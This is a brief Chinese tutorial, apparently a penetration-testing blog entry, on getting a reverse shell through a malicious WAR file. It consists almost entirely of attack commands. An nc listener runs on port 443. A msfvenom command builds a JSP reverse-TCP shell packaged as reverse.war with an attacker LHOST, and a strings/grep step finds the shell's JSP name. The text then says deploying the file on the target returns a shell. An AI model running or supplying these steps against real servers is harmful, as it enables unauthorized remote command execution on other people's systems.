016-War文件反弹shell

# War文件反弹shell

首先在本地监听TCP协议443端口

“`
nc -lvp 443

“`

使用如下命令生成war文件:

“`bash
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.10.11 LPORT=443 -f war > reverse.war

“`

查看war包中shell的jsp文件名

“`bash
strings reverse.war | grep jsp

“`

在靶机上部署war包后,访问shell的jsp文件,即可在监听端口获得反弹shell

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容